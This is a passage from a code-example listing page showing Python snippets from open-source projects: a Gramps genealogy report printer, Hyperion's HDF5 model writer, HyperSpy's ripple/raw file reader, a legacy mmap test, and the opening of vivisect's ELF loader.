                self.print_object(level+1, location)

        if issubclass(o.__class__, gramps.gen.lib.placebase.PlaceBase) or \
            issubclass(o.__class__, gramps.gen.lib.placeref.PlaceRef):
            if issubclass(o.__class__, gramps.gen.lib.placebase.PlaceBase):
                place_handle = o.get_place_handle()
            else:
                place_handle = o.get_reference_handle()
            if place_handle:
                place = self.database.get_place_from_handle(place_handle)
                if place:
                    place_title = place_displayer.display(self.database, place)
                    self.print_header(level, _("Place"), place.get_gramps_id(),
                                      _("Place Title"), place_title,
                                      privacy=place.get_privacy(),
                                      ref=place)
                    self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
                    self.doc.start_bold()
                    self.doc.write_text(_("Name") + " : ")
                    self.doc.end_bold()
                    self.doc.write_text(place.get_name().value)
                    self.doc.start_bold()
                    self.doc.write_text(" " + _("Type") + " : ")
                    self.doc.end_bold()
                    self.doc.write_text(str(place.get_type()))
                    self.doc.start_bold()
                    self.doc.write_text(" " + _("Code") + " : ")
                    self.doc.end_bold()
                    self.doc.write_text(place.get_code())
                    self.doc.end_paragraph()

                    for name in place.get_alternative_names():
                        self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
                        self.doc.start_bold()
                        self.doc.write_text(_("Alternative Name") + " : ")
                        self.doc.end_bold()
                        self.doc.write_text(name)
                        self.doc.end_paragraph()

                    if place.get_longitude() or place.get_latitude():
                        self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
                        self.doc.start_bold()
                        self.doc.write_text(_("Latitude, Longitude") + " : ")
                        self.doc.end_bold()
                        self.doc.write_text(", ".join((place.get_longitude(),
                                                       place.get_latitude())))
                        self.doc.end_paragraph()

                    self.print_object(level+1, place)

        if issubclass(o.__class__, gramps.gen.lib.primaryobj.BasicPrimaryObject):
            # The Gramps ID is printed by the enclosing object
            pass


        if issubclass(o.__class__, gramps.gen.lib.privacybase.PrivacyBase):
            # The privacy is printed by the enclosing object
            pass

        if isinstance(o, gramps.gen.lib.RepoRef):
            # The media type is printed by source
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Call number") + " : ")
            self.doc.end_bold()
            self.doc.write_text(o.get_call_number())
            self.doc.end_paragraph()

            repository_handle = o.get_reference_handle()
            repository = self.database.get_repository_from_handle(repository_handle)
            self.print_header(level, _("Repository"), repository.get_gramps_id(),
                              _("Repository type"), str(repository.get_type()),
                              privacy=repository.get_privacy())
            self.print_object(level+1, repository)

        if isinstance(o, gramps.gen.lib.Repository):
            # the repository type is printed by RepoRef
            pass

        if isinstance(o, gramps.gen.lib.Source):
            # The title, author, abbreviation and publication information are
            # printed by the bibliography code
#            data_map = o.get_data_map()
#            for key in data_map.keys():
#                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
#                self.doc.start_bold()
#                self.doc.write_text(_("Data") + ". " + key + " : ")
#                self.doc.end_bold()
#                self.doc.write_text(data_map[key])
#                self.doc.end_paragraph()

            reporef_list = o.get_reporef_list()
            for reporef in reporef_list:
                self.print_header(level, _("Repository reference"),
                                  type_desc=_("Media type"),
                                  obj_type=str(reporef.get_media_type()),
                                  privacy=reporef.get_privacy())
                self.print_object(level+1, reporef)

        if isinstance(o, gramps.gen.lib.Surname):
            if o.get_origintype():
                self.print_header(level, _("Surname"),
                                  type_desc=_("Origin type"),
                                  obj_type=str(o.get_origintype()))
            else:
                self.print_header(level, _("Surname"),
                                  privacy=o.get_privacy())
            self.doc.start_paragraph("PE-Level%d" % min(level+1, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Prefix, surname, connector") + " : ")
            self.doc.end_bold()
            self.doc.write_text(", ".join((o.get_prefix(), o.get_surname(),
                                           o.get_connector())))
            if o.get_primary():
                self.doc.write_text(" " + _("{This is the primary surname}"))
            self.doc.end_paragraph()

        if isinstance(o, gramps.gen.lib.surnamebase.SurnameBase):
            surname_list = o.get_surname_list()
            for surname in surname_list:
                self.print_object(level, surname)

        if issubclass(o.__class__, gramps.gen.lib.tagbase.TagBase):
            for tag_handle in o.get_tag_list():
                tag = self.database.get_tag_from_handle(tag_handle)
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Tag name") + " : ")
                self.doc.end_bold()
                self.doc.write_text(tag.get_name())
                self.doc.end_paragraph()
                self.print_object(level+1, tag)

        if issubclass(o.__class__, gramps.gen.lib.Tag):
            # The tag name is printed by TagBase
            if o.get_color() != "#000000000000" or o.get_priority() != 0:
                self.doc.start_paragraph("PE-Level%d" % min(level, 32))
                self.doc.start_bold()
                self.doc.write_text(_("Tag colour and priority") + " : ")
                self.doc.end_bold()
                self.doc.write_text(o.get_color() + ", " +
                                    "%d" % o.get_priority())
                self.doc.end_paragraph()

        if issubclass(o.__class__, gramps.gen.lib.urlbase.UrlBase):
            for url in o.get_url_list():
                self.print_header(level, _("URL"),
                                  type_desc=_("Type"),
                                  obj_type=str(url.get_type()),
                                  privacy=url.get_privacy())
                self.print_object(level+1, url)

        if isinstance(o, gramps.gen.lib.Url):
            self.doc.start_paragraph("PE-Level%d" % min(level, 32))
            self.doc.start_bold()
            self.doc.write_text(_("Description and Path") + " : ")
            self.doc.end_bold()
            self.doc.write_text(o.get_description() + ", ")
            path = o.get_path()
            if path:
                mark = IndexMark(path, LOCAL_HYPERLINK)
                self.doc.write_text(path, mark=mark)
            self.doc.end_paragraph()

        return o

Example 129

Project: hyperion
Source File: model.py
View license
    def write(self, filename=None, compression=True, copy=True,
              absolute_paths=False, wall_dtype=float,
              physics_dtype=float, overwrite=True):
        '''
        Write the model input parameters to an HDF5 file

        Parameters
        ----------
        filename : str
            The name of the input file to write. If no name is specified, the
            filename is constructed from the model name.
        compression : bool
            Whether to compress the datasets inside the HDF5 file.
        copy : bool
            Whether to copy all external content into the input file, or
            whether to just link to external content.
        absolute_paths : bool
            If copy=False, then if absolute_paths is True, absolute filenames
            are used in the link, otherwise the path relative to the input
            file is used.
        wall_dtype : type
            Numerical type to use for wall positions.
        physics_dtype : type
            Numerical type to use for physical grids.
        overwrite : bool
            Whether to overwrite any pre-existing file
        '''

        # If no filename has been specified, use the model name to construct
        # one. If neither have been specified, raise an exception.
        if filename is None:
            if self.name is not None:
                filename = self.name + '.rtin'
            else:
                raise ValueError("filename= has not been specified and model "
                                 "has no name")

        # Remove previous file if it exists
        if overwrite and os.path.exists(filename):
            os.remove(filename)

        # Check that grid has been set up
        if self.grid is None:
            raise Exception("No coordinate grid has been set up")

        # Check that containing directory exists to give a more understandable
        # message than 'File does not exist', since this might confuse users
        # (it is the output directory that does not exist)
        if not os.path.dirname(filename) == "":
            if not os.path.exists(os.path.dirname(filename)):
                raise IOError("Directory %s does not exist" %
                              os.path.dirname(filename))

        # Create output file
        delete_file(filename)
        root = h5py.File(filename, 'w')

        # Add Python version
        root.attrs['python_version'] = np.string_(__version__.encode('utf-8'))

        # Create all the necessary groups and sub-groups
        g_sources = root.create_group('Sources')
        g_output = root.create_group('Output')
        g_peeled = g_output.create_group('Peeled')
        g_binned = g_output.create_group('Binned')

        # Output sources
        for i, source in enumerate(self.sources):
            if isinstance(source, MapSource):
                source.write(g_sources, 'source_%05i' % (i + 1), self.grid,
                             compression=compression, map_dtype=physics_dtype)
            else:
                source.write(g_sources, 'source_%05i' % (i + 1))

        # Output configuration for peeled images/SEDs
        for i, peel in enumerate(self.peeled_output):
            if not self._frequencies is None:
                if not peel._monochromatic:
                    raise Exception("Peeled images need to be set to monochromatic mode")
            peel.write(g_peeled.create_group('group_%05i' % (i + 1)))

        # Output configuration for binned images/SEDs
        if self.binned_output is not None:
            if self.forced_first_interaction:
                raise Exception("can't use binned images with forced first interaction - use set_forced_first_interaction(False) to disable")
            self.binned_output.write(g_binned.create_group('group_00001'))

        # Write monochromatic configuration
        self._write_monochromatic(root, compression=compression)

        # Write run-time and output configuration
        self.write_run_conf(root)
        self.conf.output.write(g_output)

        if isinstance(self.grid, GridOnDisk):

            g_grid = link_or_copy(root, 'Grid', self.grid.link, copy=copy, absolute_paths=absolute_paths)

        else:

            # Create group
            g_grid = root.create_group('Grid')

            # Check self-consistency of grid
            self.grid._check_array_dimensions()

            # Write the geometry and physical quantity arrays to the input file
            self.grid.write(g_grid, copy=copy, absolute_paths=absolute_paths, compression=compression, physics_dtype=physics_dtype)

        if 'density' in self.grid:

            # Check if dust types are specified for each
            if self.dust is None:
                raise Exception("No dust properties specified")

            if isinstance(self.dust, h5py.ExternalLink):

                link_or_copy(root, 'Dust', self.dust, copy, absolute_paths=absolute_paths)

            elif isinstance(self.dust, h5py.Group):

                root.copy(self.dust, 'Dust')

            elif type(self.dust) == list:

                g_dust = root.create_group('Dust')

                if self.grid['density'].n_dust != len(self.dust):
                    raise Exception("Number of density grids should match number of dust types")

                # Output dust file, avoiding writing the same dust file multiple times
                present = {}
                for i, dust in enumerate(self.dust):

                    short_name = 'dust_%03i' % (i + 1)

                    if copy:

                        if isinstance(dust, six.string_types):
                            dust = SphericalDust(dust)

                        if dust.hash() in present:
                            g_dust[short_name] = h5py.SoftLink(present[dust.hash()])
                        else:
                            dust.write(g_dust.create_group(short_name))
                            present[dust.hash()] = short_name

                    else:

                        if type(dust) != str:
                            if dust._file is None:
                                raise ValueError("Dust properties are not located in a file, so cannot link. Use copy=True or write the dust properties to a file first")
                            else:
                                # Check that has still matches file
                                if dust.hash() != dust._file[1]:
                                    raise ValueError("Dust properties have been modified since "
                                                     "being read in, so cannot link to dust file "
                                                     "on disk. You can solve this by writing out "
                                                     "the dust properties to a new file, or by "
                                                     "using copy=True.")
                                dust = dust._file[0]

                        if absolute_paths:
                            path = os.path.abspath(dust)
                        else:
                            # Relative path should be relative to input file, not current directory.
                            path = os.path.relpath(dust, os.path.dirname(filename))

                        g_dust[short_name] = h5py.ExternalLink(path, '/')

            else:
                raise ValueError("Unknown type for dust attribute: %s" % type(self.dust))

            _n_dust = len(root['Dust'])

            # Write minimum specific energy
            if self._minimum_temperature is not None:

                if np.isscalar(self._minimum_temperature):
                    _minimum_temperature = [self._minimum_temperature for i in range(_n_dust)]
                elif len(self._minimum_temperature) != _n_dust:
                    raise Exception("Number of minimum_temperature values should match number of dust types")
                else:
                    _minimum_temperature = self._minimum_temperature

                _minimum_specific_energy = []
                for i, dust in enumerate(root['Dust']):
                    d = SphericalDust(root['Dust'][dust])
                    _minimum_specific_energy.append(d.temperature2specific_energy(_minimum_temperature[i]))

            elif self._minimum_specific_energy is not None:

                if np.isscalar(self._minimum_specific_energy):
                    _minimum_specific_energy = [self._minimum_specific_energy for i in range(_n_dust)]
                elif len(self._minimum_specific_energy) != _n_dust:
                    raise Exception("Number of minimum_specific_energy values should match number of dust types")
                else:
                    _minimum_specific_energy = self._minimum_specific_energy

            else:

                _minimum_specific_energy = None

            if isinstance(self.grid, GridOnDisk):
                if _minimum_specific_energy is not None:
                    raise ValueError("Cannot set minimum specific energy or temperature when using grid from disk")
            elif _minimum_specific_energy is not None:
                g_grid['Quantities'].attrs["minimum_specific_energy"] = [float(x) for x in _minimum_specific_energy]

        else:

            root.create_group('Dust')

        # Check that there are no NaN values in the file - if there are, a
        # warning is emitted.
        check_for_nans(root)

        root.close()

        self.filename = filename

Example 130

Project: hyperspy
Source File: ripple.py
View license
def file_reader(filename, rpl_info=None, encoding="latin-1",
                mmap_mode='c', *args, **kwds):
    """Parses a Lispix (http://www.nist.gov/lispix/) ripple (.rpl) file
    and reads the data from the corresponding raw (.raw) file;
    or, read a raw file if the dictionary rpl_info is provided.

    This format is often uses in EDS/EDX experiments.

    Images and spectral images or data cubes that are written in the
    (Lispix) raw file format are just a continuous string of numbers.

    Data cubes can be stored image by image, or spectrum by spectrum.
    Single images are stored row by row, vector cubes are stored row by row
    (each row spectrum by spectrum), image cubes are stored image by image.

    All of the numbers are in the same format, such as 16 bit signed integer,
    IEEE 8-byte real, 8-bit unsigned byte, etc.

    The "raw" file should be accompanied by text file with the same name and
    ".rpl" extension. This file lists the characteristics of the raw file so
    that it can be loaded without human intervention.

    Alternatively, dictionary 'rpl_info' containing the information can
    be given.

    Some keys are specific to HyperSpy and will be ignored by other software.

    RPL stands for "Raw Parameter List", an ASCII text, tab delimited file in
    which HyperSpy reads the image parameters for a raw file.

                    TABLE OF RPL PARAMETERS
        key             type     description
      ----------   ------------ --------------------
      # Mandatory      keys:
      width            int      # pixels per row
      height           int      # number of rows
      depth            int      # number of images or spectral pts
      offset           int      # bytes to skip
      data-type        str      # 'signed', 'unsigned', or 'float'
      data-length      str      # bytes per pixel  '1', '2', '4', or '8'
      byte-order       str      # 'big-endian', 'little-endian', or 'dont-care'
      record-by        str      # 'image', 'vector', or 'dont-care'
      # X-ray keys:
      ev-per-chan      int      # optional, eV per channel
      detector-peak-width-ev  int   # optional, FWHM for the Mn K-alpha line
      # HyperSpy-specific keys
      depth-origin    int      # energy offset in pixels
      depth-scale     float    # energy scaling (units per pixel)
      depth-units     str      # energy units, usually eV
      depth-name      str      # Name of the magnitude stored as depth
      width-origin         int      # column offset in pixels
      width-scale          float    # column scaling (units per pixel)
      width-units          str      # column units, usually nm
      width-name      str           # Name of the magnitude stored as width
      height-origin         int      # row offset in pixels
      height-scale          float    # row scaling (units per pixel)
      height-units          str      # row units, usually nm
      height-name      str           # Name of the magnitude stored as height
      signal            str        # Name of the signal stored, e.g. HAADF
      convergence-angle float   # TEM convergence angle in mrad
      collection-angle  float   # EELS spectrometer collection semi-angle in mrad
      beam-energy       float   # TEM beam energy in keV
      elevation-angle   float   # Elevation angle of the EDS detector
      azimuth-angle     float   # Elevation angle of the EDS detector
      live-time         float   # Live time per spectrum
      energy-resolution float   # Resolution of the EDS (FHWM of MnKa)
      tilt-stage        float   # The tilt of the stage
      date              str     # date in ISO 8601
      time              str     # time in ISO 8601

    NOTES

    When 'data-length' is 1, the 'byte order' is not relevant as there is only
    one byte per datum, and 'byte-order' should be 'dont-care'.

    When 'depth' is 1, the file has one image, 'record-by' is not relevant and
    should be 'dont-care'. For spectral images, 'record-by' is 'vector'.
    For stacks of images, 'record-by' is 'image'.

    Floating point numbers can be IEEE 4-byte, or IEEE 8-byte. Therefore if
    data-type is float, data-length MUST be 4 or 8.

    The rpl file is read in a case-insensitive manner. However, when providing
    a dictionary as input, the keys MUST be lowercase.

    Comment lines, beginning with a semi-colon ';' are allowed anywhere.

    The first non-comment in the rpl file line MUST have two column names:
    'name_1'<TAB>'name_2'; any name would do e.g. 'key'<TAB>'value'.

    Parameters can be in ANY order.

    In the rpl file, the parameter name is followed by ONE tab (spaces are
    ignored) e.g.: 'data-length'<TAB>'2'

    In the rpl file, other data and more tabs can follow the two items on
    each row, and are ignored.

    Other keys and values can be included and are ignored.

    Any number of spaces can go along with each tab.

    """

    if not rpl_info:
        if filename[-3:] in file_extensions:
            with codecs.open(filename, encoding=encoding,
                             errors='replace') as f:
                rpl_info = parse_ripple(f)
        else:
            raise IOError('File has wrong extension: "%s"' % filename[-3:])
    for ext in ['raw', 'RAW']:
        rawfname = filename[:-3] + ext
        if os.path.exists(rawfname):
            break
        else:
            rawfname = ''
    if not rawfname:
        raise IOError('RAW file "%s" does not exists' % rawfname)
    else:
        data = read_raw(rpl_info, rawfname, mmap_mode=mmap_mode)

    if rpl_info['record-by'] == 'vector':
        _logger.info('Loading as Signal1D')
        record_by = 'spectrum'
    elif rpl_info['record-by'] == 'image':
        _logger.info('Loading as Signal2D')
        record_by = 'image'
    else:
        if len(data.shape) == 1:
            _logger.info('Loading as Signal1D')
            record_by = 'spectrum'
        else:
            _logger.info('Loading as Signal2D')
            record_by = 'image'

    if rpl_info['record-by'] == 'vector':
        idepth, iheight, iwidth = 2, 0, 1
        names = ['height', 'width', 'depth', ]
    else:
        idepth, iheight, iwidth = 0, 1, 2
        names = ['depth', 'height', 'width']

    scales = [1, 1, 1]
    origins = [0, 0, 0]
    units = ['', '', '']
    sizes = [rpl_info[names[i]] for i in range(3)]

    if 'date' not in rpl_info:
        rpl_info['date'] = ""

    if 'time' not in rpl_info:
        rpl_info['time'] = ""

    if 'signal' not in rpl_info:
        rpl_info['signal'] = ""

    if 'depth-scale' in rpl_info:
        scales[idepth] = rpl_info['depth-scale']
    # ev-per-chan is the only calibration supported by the original ripple
    # format
    elif 'ev-per-chan' in rpl_info:
        scales[idepth] = rpl_info['ev-per-chan']

    if 'depth-origin' in rpl_info:
        origins[idepth] = rpl_info['depth-origin']

    if 'depth-units' in rpl_info:
        units[idepth] = rpl_info['depth-units']

    if 'depth-name' in rpl_info:
        names[idepth] = rpl_info['depth-name']

    if 'width-origin' in rpl_info:
        origins[iwidth] = rpl_info['width-origin']

    if 'width-scale' in rpl_info:
        scales[iwidth] = rpl_info['width-scale']

    if 'width-units' in rpl_info:
        units[iwidth] = rpl_info['width-units']

    if 'width-name' in rpl_info:
        names[iwidth] = rpl_info['width-name']

    if 'height-origin' in rpl_info:
        origins[iheight] = rpl_info['height-origin']

    if 'height-scale' in rpl_info:
        scales[iheight] = rpl_info['height-scale']

    if 'height-units' in rpl_info:
        units[iheight] = rpl_info['height-units']

    if 'height-name' in rpl_info:
        names[iheight] = rpl_info['height-name']

    mp = DictionaryTreeBrowser({
        'General': {'original_filename': os.path.split(filename)[1],
                    'date': rpl_info['date'],
                    'time': rpl_info['time']},
        "Signal": {'signal_type': rpl_info['signal'],
                   'record_by': record_by},
    })
    if 'convergence-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.convergence_angle',
                    rpl_info['convergence-angle'])
    if 'tilt-stage' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.tilt_stage',
                    rpl_info['tilt-stage'])
    if 'collection-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EELS.' +
                    'collection_angle',
                    rpl_info['collection-angle'])
    if 'beam-energy' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.beam_energy',
                    rpl_info['beam-energy'])
    if 'elevation-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.elevation_angle',
                    rpl_info['elevation-angle'])
    if 'azimuth-angle' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.azimuth_angle',
                    rpl_info['azimuth-angle'])
    if 'energy-resolution' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.' +
                    'energy_resolution_MnKa',
                    rpl_info['energy-resolution'])
    if 'detector-peak-width-ev' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.' +
                    'energy_resolution_MnKa',
                    rpl_info['detector-peak-width-ev'])
    if 'live-time' in rpl_info:
        mp.set_item('Acquisition_instrument.TEM.Detector.EDS.live_time',
                    rpl_info['live-time'])

    axes = []
    index_in_array = 0
    for i in range(3):
        if sizes[i] > 1:
            axes.append({
                'size': sizes[i],
                'index_in_array': index_in_array,
                'name': names[i],
                'scale': scales[i],
                'offset': origins[i],
                'units': units[i],
            })
            index_in_array += 1

    dictionary = {
        'data': data.squeeze(),
        'axes': axes,
        'metadata': mp.as_dictionary(),
        'original_metadata': rpl_info
    }
    return [dictionary, ]

Example 131

Project: babble
Source File: test_mmap.py
View license
def test_both():
    "Test mmap module on Unix systems and Windows"

    # Create a file to be mmap'ed.
    if os.path.exists(TESTFN):
        os.unlink(TESTFN)
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        # Write 2 pages worth of data to the file
        f.write('\0'* PAGESIZE)
        f.write('foo')
        f.write('\0'* (PAGESIZE-3) )
        f.flush()
        m = mmap.mmap(f.fileno(), 2 * PAGESIZE)
        f.close()

        # Simple sanity checks

        print type(m)  # SF bug 128713:  segfaulted on Linux
        print '  Position of foo:', m.find('foo') / float(PAGESIZE), 'pages'
        vereq(m.find('foo'), PAGESIZE)

        print '  Length of file:', len(m) / float(PAGESIZE), 'pages'
        vereq(len(m), 2*PAGESIZE)

        print '  Contents of byte 0:', repr(m[0])
        vereq(m[0], '\0')
        print '  Contents of first 3 bytes:', repr(m[0:3])
        vereq(m[0:3], '\0\0\0')

        # Modify the file's content
        print "\n  Modifying file's content..."
        m[0] = '3'
        m[PAGESIZE +3: PAGESIZE +3+3] = 'bar'

        # Check that the modification worked
        print '  Contents of byte 0:', repr(m[0])
        vereq(m[0], '3')
        print '  Contents of first 3 bytes:', repr(m[0:3])
        vereq(m[0:3], '3\0\0')
        print '  Contents of second page:',  repr(m[PAGESIZE-1 : PAGESIZE + 7])
        vereq(m[PAGESIZE-1 : PAGESIZE + 7], '\0foobar\0')

        m.flush()

        # Test doing a regular expression match in an mmap'ed file
        match = re.search('[A-Za-z]+', m)
        if match is None:
            print '  ERROR: regex match on mmap failed!'
        else:
            start, end = match.span(0)
            length = end - start

            print '  Regex match on mmap (page start, length of match):',
            print start / float(PAGESIZE), length

            vereq(start, PAGESIZE)
            vereq(end, PAGESIZE + 6)

        # test seeking around (try to overflow the seek implementation)
        m.seek(0,0)
        print '  Seek to zeroth byte'
        vereq(m.tell(), 0)
        m.seek(42,1)
        print '  Seek to 42nd byte'
        vereq(m.tell(), 42)
        m.seek(0,2)
        print '  Seek to last byte'
        vereq(m.tell(), len(m))

        print '  Try to seek to negative position...'
        try:
            m.seek(-1)
        except ValueError:
            pass
        else:
            verify(0, 'expected a ValueError but did not get it')

        print '  Try to seek beyond end of mmap...'
        try:
            m.seek(1,2)
        except ValueError:
            pass
        else:
            verify(0, 'expected a ValueError but did not get it')

        print '  Try to seek to negative position...'
        try:
            m.seek(-len(m)-1,2)
        except ValueError:
            pass
        else:
            verify(0, 'expected a ValueError but did not get it')

        # Try resizing map
        print '  Attempting resize()'
        try:
            m.resize(512)
        except SystemError:
            # resize() not supported
            # No messages are printed, since the output of this test suite
            # would then be different across platforms.
            pass
        else:
            # resize() is supported
            verify(len(m) == 512,
                    "len(m) is %d, but expecting 512" % (len(m),) )
            # Check that we can no longer seek beyond the new size.
            try:
                m.seek(513,0)
            except ValueError:
                pass
            else:
                verify(0, 'Could seek beyond the new size')

            # Check that the underlying file is truncated too
            # (bug #728515)
            f = open(TESTFN)
            f.seek(0, 2)
            verify(f.tell() == 512, 'Underlying file not truncated')
            f.close()
            verify(m.size() == 512, 'New size not reflected in file')

        m.close()

    finally:
        try:
            f.close()
        except OSError:
            pass
        try:
            os.unlink(TESTFN)
        except OSError:
            pass

    # Test for "access" keyword parameter
    try:
        mapsize = 10
        print "  Creating", mapsize, "byte test data file."
        open(TESTFN, "wb").write("a"*mapsize)
        print "  Opening mmap with access=ACCESS_READ"
        f = open(TESTFN, "rb")
        m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_READ)
        verify(m[:] == 'a'*mapsize, "Readonly memory map data incorrect.")

        print "  Ensuring that readonly mmap can't be slice assigned."
        try:
            m[:] = 'b'*mapsize
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be item assigned."
        try:
            m[0] = 'b'
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be write() to."
        try:
            m.seek(0,0)
            m.write('abc')
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be write_byte() to."
        try:
            m.seek(0,0)
            m.write_byte('d')
        except TypeError:
            pass
        else:
            verify(0, "Able to write to readonly memory map")

        print "  Ensuring that readonly mmap can't be resized."
        try:
            m.resize(2*mapsize)
        except SystemError:   # resize is not universally supported
            pass
        except TypeError:
            pass
        else:
            verify(0, "Able to resize readonly memory map")
        del m, f
        verify(open(TESTFN, "rb").read() == 'a'*mapsize,
               "Readonly memory map data file was modified")

        print "  Opening mmap with size too big"
        import sys
        f = open(TESTFN, "r+b")
        try:
            m = mmap.mmap(f.fileno(), mapsize+1)
        except ValueError:
            # we do not expect a ValueError on Windows
            # CAUTION:  This also changes the size of the file on disk, and
            # later tests assume that the length hasn't changed.  We need to
            # repair that.
            if sys.platform.startswith('win'):
                verify(0, "Opening mmap with size+1 should work on Windows.")
        else:
            # we expect a ValueError on Unix, but not on Windows
            if not sys.platform.startswith('win'):
                verify(0, "Opening mmap with size+1 should raise ValueError.")
            m.close()
        f.close()
        if sys.platform.startswith('win'):
            # Repair damage from the resizing test.
            f = open(TESTFN, 'r+b')
            f.truncate(mapsize)
            f.close()

        print "  Opening mmap with access=ACCESS_WRITE"
        f = open(TESTFN, "r+b")
        m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_WRITE)
        print "  Modifying write-through memory map."
        m[:] = 'c'*mapsize
        verify(m[:] == 'c'*mapsize,
               "Write-through memory map memory not updated properly.")
        m.flush()
        m.close()
        f.close()
        f = open(TESTFN, 'rb')
        stuff = f.read()
        f.close()
        verify(stuff == 'c'*mapsize,
               "Write-through memory map data file not updated properly.")

        print "  Opening mmap with access=ACCESS_COPY"
        f = open(TESTFN, "r+b")
        m = mmap.mmap(f.fileno(), mapsize, access=mmap.ACCESS_COPY)
        print "  Modifying copy-on-write memory map."
        m[:] = 'd'*mapsize
        verify(m[:] == 'd' * mapsize,
               "Copy-on-write memory map data not written correctly.")
        m.flush()
        verify(open(TESTFN, "rb").read() == 'c'*mapsize,
               "Copy-on-write test data file should not be modified.")
        try:
            print "  Ensuring copy-on-write maps cannot be resized."
            m.resize(2*mapsize)
        except TypeError:
            pass
        else:
            verify(0, "Copy-on-write mmap resize did not raise exception.")
        del m, f
        try:
            print "  Ensuring invalid access parameter raises exception."
            f = open(TESTFN, "r+b")
            m = mmap.mmap(f.fileno(), mapsize, access=4)
        except ValueError:
            pass
        else:
            verify(0, "Invalid access code should have raised exception.")

        if os.name == "posix":
            # Try incompatible flags, prot and access parameters.
            f = open(TESTFN, "r+b")
            try:
                m = mmap.mmap(f.fileno(), mapsize, flags=mmap.MAP_PRIVATE,
                              prot=mmap.PROT_READ, access=mmap.ACCESS_WRITE)
            except ValueError:
                pass
            else:
                verify(0, "Incompatible parameters should raise ValueError.")
            f.close()
    finally:
        try:
            os.unlink(TESTFN)
        except OSError:
            pass

    print '  Try opening a bad file descriptor...'
    try:
        mmap.mmap(-2, 4096)
    except mmap.error:
        pass
    else:
        verify(0, 'expected a mmap.error but did not get it')

    # Do a tougher .find() test.  SF bug 515943 pointed out that, in 2.2,
    # searching for data with embedded \0 bytes didn't work.
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        data = 'aabaac\x00deef\x00\x00aa\x00'
        n = len(data)
        f.write(data)
        f.flush()
        m = mmap.mmap(f.fileno(), n)
        f.close()

        for start in range(n+1):
            for finish in range(start, n+1):
                slice = data[start : finish]
                vereq(m.find(slice), data.find(slice))
                vereq(m.find(slice + 'x'), -1)
        m.close()

    finally:
        os.unlink(TESTFN)

    # make sure a double close doesn't crash on Solaris (Bug# 665913)
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        f.write(2**16 * 'a') # Arbitrary character
        f.close()

        f = open(TESTFN)
        mf = mmap.mmap(f.fileno(), 2**16, access=mmap.ACCESS_READ)
        mf.close()
        mf.close()
        f.close()

    finally:
        os.unlink(TESTFN)

    # test mapping of entire file by passing 0 for map length
    if hasattr(os, "stat"):
        print "  Ensuring that passing 0 as map length sets map size to current file size."
        f = open(TESTFN, "w+")

        try:
            f.write(2**16 * 'm') # Arbitrary character
            f.close()

            f = open(TESTFN, "rb+")
            mf = mmap.mmap(f.fileno(), 0)
            verify(len(mf) == 2**16, "Map size should equal file size.")
            vereq(mf.read(2**16), 2**16 * "m")
            mf.close()
            f.close()

        finally:
            os.unlink(TESTFN)

    # test mapping of entire file by passing 0 for map length
    if hasattr(os, "stat"):
        print "  Ensuring that passing 0 as map length sets map size to current file size."
        f = open(TESTFN, "w+")
        try:
            f.write(2**16 * 'm') # Arbitrary character
            f.close()

            f = open(TESTFN, "rb+")
            mf = mmap.mmap(f.fileno(), 0)
            verify(len(mf) == 2**16, "Map size should equal file size.")
            vereq(mf.read(2**16), 2**16 * "m")
            mf.close()
            f.close()

        finally:
            os.unlink(TESTFN)

    # make move works everywhere (64-bit format problem earlier)
    f = open(TESTFN, 'w+')

    try:    # unlink TESTFN no matter what
        f.write("ABCDEabcde") # Arbitrary character
        f.flush()

        mf = mmap.mmap(f.fileno(), 10)
        mf.move(5, 0, 5)
        verify(mf[:] == "ABCDEABCDE", "Map move should have duplicated front 5")
        mf.close()
        f.close()

    finally:
        os.unlink(TESTFN)

    # Test that setting access to PROT_READ gives exception
    # rather than crashing
    if hasattr(mmap, "PROT_READ"):
        try:
            mapsize = 10
            open(TESTFN, "wb").write("a"*mapsize)
            f = open(TESTFN, "rb")
            m = mmap.mmap(f.fileno(), mapsize, prot=mmap.PROT_READ)
            try:
                m.write("foo")
            except TypeError:
                pass
            else:
                verify(0, "PROT_READ is not working")
        finally:
            os.unlink(TESTFN)

Example 132

Project: vivisect
Source File: elf.py
View license
def loadElfIntoWorkspace(vw, elf, filename=None):

    arch = arch_names.get(elf.e_machine)
    if arch == None:
       raise Exception("Unsupported Architecture: %d\n", elf.e_machine)

    platform = elf.getPlatform()

    # setup needed platform/format
    vw.setMeta('Architecture', arch)
    vw.setMeta('Platform', platform)
    vw.setMeta('Format', 'elf')

    vw.setMeta('DefaultCall', archcalls.get(arch,'unknown'))

    vw.addNoReturnApi("*.exit")

    # Base addr is earliest section address rounded to pagesize
    # NOTE: This is only for prelink'd so's and exe's.  Make something for old style so.
    addbase = False
    if not elf.isPreLinked() and elf.isSharedObject():
        addbase = True
    baseaddr = elf.getBaseAddress()

    #FIXME make filename come from dynamic's if present for shared object
    if filename == None:
        filename = "elf_%.8x" % baseaddr

    fhash = "unknown hash"
    if os.path.exists(filename):
        fhash = v_parsers.md5File(filename)

